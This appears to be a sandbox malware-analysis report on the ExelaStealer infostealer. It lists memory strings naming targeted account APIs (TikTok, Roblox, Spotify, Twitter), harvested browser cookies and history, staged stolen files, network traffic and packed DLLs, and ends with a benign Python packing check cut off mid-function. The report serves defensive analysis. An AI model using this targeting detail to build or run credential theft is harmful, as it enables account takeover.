            Source: rename_me_before.exe, 00000001.00000003.1949293092.000001B103309000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980548513.000001B103309000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949632345.000001B103309000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1719040380.000001B103409000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966669110.000001B103309000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101C80000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1719040380.000001B1034AA000.00000004.00000020.00020000.00000000.sdmp, Historys.txt.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B1033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: rename_me_before.exe, 00000001.00000003.1966972745.000001B102228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/ExelaStealer
            Source: rename_me_before.exe, 00000001.00000002.1980252152.000001B102F50000.00000004.00001000.00020000.00000000.sdmp, system_info.txt.1.dr, Cookies.txt.1.dr, network_info.txt.1.dr, Historys.txt.1.dr, process_info.txt.1.drString found in binary or memory: https://t.me/ExelaStealer----------------------
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://thumbnails.roblox.com/v1/users/avatar?userIds=
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi
            Source: METADATA.0.drString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=referral&utm_campa
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com/
            Source: rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com
            Source: rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
            Source: rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/home
            Source: rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/homeP
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.json
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D04000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1979075425.000001B101E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap
            Source: rename_me_before.exe, 00000000.00000003.1662503428.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drString found in binary or memory: https://www.apache.org/licenses/
            Source: rename_me_before.exe, 00000000.00000003.1662615614.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1662503428.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1662689097.000001CF0A2A1000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1662503428.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
            Source: METADATA.0.drString found in binary or memory: https://www.attrs.org/
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/23.2.0/_static/sponsors/FilePreviews.svg
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/23.2.0/_static/sponsors/Tidelift.svg
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/23.2.0/_static/sponsors/Variomedia.svg
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/latest/names.html)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/changelog.html
            Source: METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes).
            Source: rename_me_before.exe, 00000001.00000002.1980252152.000001B102F50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: rename_me_before.exe, 00000001.00000003.1949293092.000001B1032A6000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1970308905.000001B102229000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1963524951.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965367237.000001B100B88000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969084056.000001B102228000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1976940031.000001B100B8A000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966972745.000001B102228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978027683.000001B101458000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: rename_me_before.exe, 00000001.00000003.1949293092.000001B1032A6000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101CCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, libcrypto-3.dll.0.drString found in binary or memory: https://www.openssl.org/H
            Source: rename_me_before.exe, 00000001.00000002.1976728516.000001B1009F2000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968294358.000001B1009F1000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B1009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
            Source: rename_me_before.exe, 00000001.00000002.1981358821.000001B17FE20000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
            Source: rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/
            Source: rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/P
            Source: rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.roblox.com/my/account/json
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.roblox.com/my/account/json0
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok
            Source: rename_me_before.exe, 00000001.00000002.1976903040.000001B100B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
            Source: rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.variomedia.de/
            Source: rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966055870.000001B100617000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975824517.000001B100655000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968170677.000001B100654000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zopeinterface.readthedocs.io/en/latest/
            Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS

            Spam, unwanted Advertisements and Ransom Demands

            Source: C:\Users\user\Desktop\rename_me_before.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\ONBQCLYSPU.pdf
            Source: C:\Users\user\Desktop\rename_me_before.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\VLZDGUKUTZ.jpg
            Source: C:\Users\user\Desktop\rename_me_before.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\KZWFNRXYKI.pdf
            Source: C:\Users\user\Desktop\rename_me_before.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\DVWHKMNFNN.jpg
            Source: C:\Users\user\Desktop\rename_me_before.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\VLZDGUKUTZ.docx
            Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404FFBD8 0_2_00007FF6404FFBD8
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF640505C74 0_2_00007FF640505C74
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF640504F10 0_2_00007FF640504F10
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404E1000 0_2_00007FF6404E1000
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF64050518C 0_2_00007FF64050518C
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404F91B0 0_2_00007FF6404F91B0
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404FD200 0_2_00007FF6404FD200
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404F1280 0_2_00007FF6404F1280
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404F7AAC 0_2_00007FF6404F7AAC
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF640508A38 0_2_00007FF640508A38
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404F0A60 0_2_00007FF6404F0A60
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404E8B20 0_2_00007FF6404E8B20
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF640500B84 0_2_00007FF640500B84
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6405033BC 0_2_00007FF6405033BC
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404F73F4 0_2_00007FF6404F73F4
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404F1484 0_2_00007FF6404F1484
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404F0C64 0_2_00007FF6404F0C64
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404F2CC4 0_2_00007FF6404F2CC4
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404FCD6C 0_2_00007FF6404FCD6C
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404E95FB 0_2_00007FF6404E95FB
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404F0E70 0_2_00007FF6404F0E70
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404F1F30 0_2_00007FF6404F1F30
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404FFBD8 0_2_00007FF6404FFBD8
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF640505728 0_2_00007FF640505728
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF640502F20 0_2_00007FF640502F20
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404E979B 0_2_00007FF6404E979B
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404E9FCD 0_2_00007FF6404E9FCD
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404FD880 0_2_00007FF6404FD880
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404F5040 0_2_00007FF6404F5040
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404F1074 0_2_00007FF6404F1074
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 0_2_00007FF6404F28C0 0_2_00007FF6404F28C0
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF640505C74 1_2_00007FF640505C74
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404E95FB 1_2_00007FF6404E95FB
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404E1000 1_2_00007FF6404E1000
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF64050518C 1_2_00007FF64050518C
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404F91B0 1_2_00007FF6404F91B0
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404FD200 1_2_00007FF6404FD200
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404F1280 1_2_00007FF6404F1280
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404F7AAC 1_2_00007FF6404F7AAC
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF640508A38 1_2_00007FF640508A38
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404F0A60 1_2_00007FF6404F0A60
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404E8B20 1_2_00007FF6404E8B20
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF640500B84 1_2_00007FF640500B84
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6405033BC 1_2_00007FF6405033BC
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404F73F4 1_2_00007FF6404F73F4
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404FFBD8 1_2_00007FF6404FFBD8
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404F1484 1_2_00007FF6404F1484
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404F0C64 1_2_00007FF6404F0C64
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404F2CC4 1_2_00007FF6404F2CC4
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404FCD6C 1_2_00007FF6404FCD6C
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404F0E70 1_2_00007FF6404F0E70
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF640504F10 1_2_00007FF640504F10
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404F1F30 1_2_00007FF6404F1F30
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404FFBD8 1_2_00007FF6404FFBD8
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF640505728 1_2_00007FF640505728
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF640502F20 1_2_00007FF640502F20
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404E979B 1_2_00007FF6404E979B
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404E9FCD 1_2_00007FF6404E9FCD
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404FD880 1_2_00007FF6404FD880
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404F5040 1_2_00007FF6404F5040
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404F1074 1_2_00007FF6404F1074
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: 1_2_00007FF6404F28C0 1_2_00007FF6404F28C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 69_2_00007FFD99E21699 69_2_00007FFD99E21699
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: String function: 00007FF6404E2760 appears 36 times
            Source: C:\Users\user\Desktop\rename_me_before.exe Code function: String function: 00007FF6404E25F0 appears 100 times
            Source: _overlapped.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: unicodedata.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: python3.dll.0.dr Static PE information: No import functions for PE file found
            Source: rename_me_before.exeBinary or memory string: OriginalFilename vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000000.1659094858.00007FF640526000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameExela.exej% vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1659342426.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1660274517.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1664424670.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1660916713.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1661025344.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs rename_me_before.exe
            Source: rename_me_before.exeBinary or memory string: OriginalFilename vs rename_me_before.exe
            Source: rename_me_before.exe, 00000001.00000002.1981233285.000001B17FDC0000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000001.00000000.1666086180.00007FF640526000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameExela.exej% vs rename_me_before.exe
            Source: rename_me_before.exeBinary or memory string: OriginalFilenameExela.exej% vs rename_me_before.exe
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: Commandline size = 3647
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
            Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
            Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
            Source: python311.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992887181541107
            Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9971625026106934
            Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942873714221825
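The five UPX1 rows above are the report's packing indicator: a section whose bytes barely shrink under zlib is already compressed or encrypted, which for a section literally named UPX1 means the dropped Python runtime DLLs (python311.dll, sqlite3.dll, libssl-3.dll, libcrypto-3.dll, unicodedata.pyd) were shipped UPX-packed. The following Python reproduces that check without pefile; it is an added example, not code from the report or from the sample, and it assumes that Joe Sandbox's "ZLIB complexity" is the compressed-size to raw-size ratio (the 0.99 threshold is my own choice, picked because every flagged row above sits above it). The minimal PE parser reads only the section table, and the PE it is demonstrated on is a constructed, non-loadable fixture built in the block.

```python
import os
import struct
import zlib
from collections import Counter
from math import log2


def zlib_complexity(data: bytes) -> float:
    """Compressed length divided by raw length (assumed to match the report's
    'ZLIB complexity'). Values close to 1.0 mean zlib found almost nothing to
    remove: the bytes are already compressed (UPX, PyInstaller zlib archives) or encrypted."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def shannon_entropy(data: bytes) -> float:
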